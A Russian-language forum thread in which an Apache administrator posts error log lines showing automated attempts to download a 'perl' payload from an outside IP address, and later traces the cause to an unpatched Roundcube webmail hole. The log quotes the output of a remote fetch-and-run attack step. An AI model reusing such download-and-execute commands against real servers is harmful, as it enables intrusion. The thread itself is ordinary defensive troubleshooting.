форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка

Вариант для распечатки		Пред. тема | След. тема
Форум Информационная безопасность (Проблемы с безопасностью / Linux)
Изначальное сообщение		[ Отслеживать ]

"попытки атак через apache?"	+/–
Сообщение от dmg2k (ok) on 18-Янв-11, 16:24
в error log  Apache/2.2.8 на CentOS периодически встречаются такие записи: --2011-01-17 03:04:36--  http://219.159.68.212:8080/.../perl Connecting to 219.159.68.212:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 38205 (37K) [text/plain] Saving to: `perl'      0K .......... .......... .......... .......              100% 32.3K=1.2s 2011-01-17 03:04:38 (32.3 KB/s) - `perl' saved [38205/38205]   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                  Dload  Upload   Total   Spent    Left  Speed :00:06 15122^M100 38205  100 38205    0     0  19982      0  0:00:01  0:00:01 --:--:-- 33308 sh: fetch: command not found sh: lynx: command not found perl: no process killed IP адреса всё время разные, название файла или perl или blue. Что такое происходит? и как с этим бороться? В других логах эти адреса не появляются. Апач стоит за nginx
Ответить | Правка | Cообщить модератору

Сообщения по теме

[Сортировка по времени | RSS]

1. "попытки атак через apache?"	+/–
Сообщение от MrSixties on 19-Янв-11, 16:24
Посмотрите в логе какой был запрос, выясните куда (к какому скрипту, например) обращался этот запрос и т.п. Судя по всему это какой-то скрипт, который в автоматическом режиме "тыкается" сервера. Удостоверьтесь, что у вас "дыры", через которые лезет скрипт закрыты и, в принципе можете не беспокоиться. Хотя, как вариант можете попробовать поставить mod_security или на худой конец Snort - хотя бы на некоторое время, может распознает что-то. P.S. Вы не могли бы выслать мне все логи сервера, связанные с этой гипотетической атакой? Очень интересно было бы поизучать. Если бы Вы это сделали был Вам премного благодарен!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	2. "попытки атак через apache?"	+/–
	Сообщение от MrSixties on 19-Янв-11, 16:26
	Прошу прощения) Мой E-mail -  politically-incorrect@yandex.ru
	Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

3. "попытки атак через apache?"	+/–
Сообщение от dmg2k (ok) on 14-Фев-11, 19:59
больше ни в каких логах эта проблема не проявлялась. Все дело оказалось в дыре в веб-почте roundcube, через которую и происходили попытки атак, которые проявляли себя в том числе периодическими подвисаниями процесса apache. После обновления roundcube проблема исчезла.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема